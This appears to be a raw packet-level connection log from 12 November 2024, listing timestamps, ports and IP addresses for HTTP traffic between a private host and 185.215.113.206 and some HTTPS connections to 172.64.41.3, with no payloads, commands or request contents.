Nov 12, 2024 00:06:26.007162094 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007179976 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007193089 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007210016 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007210016 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007246017 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007246017 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007482052 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007524014 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007571936 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007584095 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007627010 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007661104 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007672071 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007683039 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007708073 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007735014 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007814884 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007844925 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007853985 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007857084 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007878065 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007901907 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007930040 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007942915 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007967949 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.007981062 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.008312941 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.008331060 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.008348942 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.008358002 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.008371115 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.008377075 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.008387089 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.008398056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.008409977 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.008421898 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.008431911 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.008433104 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.008454084 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.008467913 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.009068966 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009094000 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009105921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009109974 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.009135962 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.009143114 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.009319067 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009356022 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.009499073 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009514093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009524107 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009535074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009545088 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.009548903 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009561062 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009562016 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.009573936 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009584904 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.009586096 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.009598017 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.009628057 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.010332108 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.010344028 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.010361910 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.010373116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.010385036 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.010385036 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.010402918 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.010405064 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.010416031 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.010428905 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.010428905 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.010453939 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.010456085 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.010473013 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.010502100 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.012147903 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.012175083 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.012192965 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.012206078 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.111689091 CET	49829	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.111732960 CET	443	49829	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.111952066 CET	49830	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.111980915 CET	443	49830	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.111984968 CET	49829	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.112044096 CET	49830	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.112413883 CET	49830	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.112430096 CET	443	49830	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.112579107 CET	49829	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.112593889 CET	443	49829	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.119616032 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119635105 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119648933 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119685888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119698048 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119709015 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119713068 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.119743109 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.119752884 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.119785070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119796991 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119808912 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119831085 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.119858980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.119872093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119884014 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119894028 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.119913101 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.119936943 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120074987 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120131016 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120141983 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120155096 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120167017 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120167017 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120193005 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120209932 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120256901 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120268106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120279074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120290041 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120290995 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120306969 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120311975 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120331049 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120357037 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120688915 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120701075 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120718956 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120732069 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120754004 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120758057 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120768070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120779037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120783091 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120800018 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120816946 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120846033 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120855093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120867014 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120884895 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120901108 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120928049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120939016 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120949984 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.120970011 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.120995998 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.121093035 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121148109 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121157885 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121169090 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121180058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121181965 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.121202946 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.121227980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.121236086 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121246099 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121258020 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121272087 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.121284008 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121289015 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.121378899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121390104 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121407032 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121423006 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.121445894 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.121471882 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121484041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121495008 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.121524096 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.121545076 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.124695063 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124706984 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124748945 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.124845028 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124861002 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124871969 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124886990 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.124892950 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124906063 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124916077 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124917984 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.124928951 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124942064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124948978 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.124957085 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124973059 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124965906 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.124988079 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124999046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.124999046 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125015020 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125027895 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125044107 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125159025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125200033 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125217915 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125227928 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125240088 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125267029 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125286102 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125298023 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125308990 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125339031 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125370026 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125407934 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125430107 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125442028 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125462055 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125482082 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125494003 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125505924 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125519037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125529051 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125539064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125540018 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125576019 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125701904 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125729084 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125777960 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125853062 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125864983 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125875950 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125886917 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125890017 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125905037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125916004 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125922918 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125930071 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125941992 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125953913 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125955105 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125965118 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125974894 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.125977993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125991106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.125992060 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.126003981 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.126018047 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.126043081 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.126240015 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.126286983 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.126293898 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.126306057 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.126327038 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.126343966 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.126367092 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.126384020 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.126395941 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.126399994 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.126410007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.126416922 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.126431942 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.126449108 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.134076118 CET	443	49819	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.134294987 CET	443	49818	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.134855032 CET	443	49820	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.135226011 CET	443	49817	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.161075115 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.161086082 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.161128044 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.161183119 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.161201000 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.161216021 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.161233902 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.212114096 CET	49819	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.215993881 CET	49820	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.215996027 CET	49817	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.232167959 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232194901 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232256889 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232266903 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232305050 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232335091 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232356071 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232368946 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232372046 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232381105 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232388973 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232397079 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232412100 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232419968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232434034 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232434988 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232444048 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232461929 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232462883 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232475042 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232491016 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232495070 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232502937 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232513905 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232539892 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232573986 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232664108 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232675076 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232686043 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232697010 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232702017 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232709885 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232718945 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232738018 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232753038 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232764006 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232775927 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232784986 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232796907 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232815981 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232842922 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232873917 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232877016 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232886076 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232897997 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.232904911 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232918978 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232937098 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.232971907 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233007908 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233009100 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233021975 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233038902 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233068943 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233103991 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233114004 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233124971 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233136892 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233144045 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233151913 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233159065 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233164072 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233176947 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233180046 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233205080 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233230114 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233397007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233431101 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233453035 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233464956 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233484983 CET	49758	80	192.168.2.5	185.215.113.206
